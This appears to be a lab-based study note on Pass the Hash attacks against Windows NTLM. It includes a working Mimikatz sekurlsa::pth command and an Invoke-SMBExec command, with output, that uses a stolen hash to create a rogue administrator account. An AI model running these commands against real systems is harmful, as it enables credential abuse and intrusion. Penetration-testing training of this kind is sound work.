>Attacker uses a password hash instead of the plain text password for authentication.

>Attacker must have administrative privileges or particular privileges on the target machine to obtain a password hash.

Hashes can be obtained in several ways, including:

- Dumping the local SAM database from a compromised host.
- Extracting hashes from the NTDS database (ntds.dit) on a Domain Controller.
- Pulling the hashes from memory (lsass.exe).

## Introduction to Windows NTLM

> Microsoft's [Windows New Technology LAN Manager (NTLM)](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview)

- NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user's identity without having them provide a password.
- With NTLM, passwords stored on the server and domain controller are not "salted," which means that an adversary with a password hash can authenticate a session without knowing the original password. We call this a `Pass the Hash (PtH) Attack`.

## Pass the Hash with Mimikatz (Windows)

Mimikatz has a module named `sekurlsa::pth` that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password. To use this module, we will need the following:

- `/user` - The user name we want to impersonate.
- `/rc4` or `/NTLM` - NTLM hash of the user's password.
- `/domain` - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
- `/run` - The program we want to run with the user's context (if not specified, it will launch cmd.exe).
```cmd-session
c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```

## Pass the Hash with PowerShell Invoke-TheHash (Windows)

When using `Invoke-TheHash`, we have two options: SMB or WMI command execution. To use this tool, we need to specify the following parameters to execute commands in the target computer:

- `Target` - Hostname or IP address of the target.
- `Username` - Username to use for authentication.
- `Domain` - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
- `Hash` - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
- `Command` - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.

```powershell-session

# The following commands will use the SMB method for command execution to create a new user named mark and add the user to the Administrators group.


PS c:\htb> cd C:\tools\Invoke-TheHash\
PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

VERBOSE: [+] inlanefreight.htb\julio successfully authenticated on 172.16.1.10
VERBOSE: inlanefreight.htb\julio has Service Control Manager write privilege on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU created on 172.16.1.10
VERBOSE: [*] Trying to execute command on 172.16.1.10
[+] Command executed with service EGDKNNLQVOLFHRQTQMAU on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU deleted on 172.16.1.10
```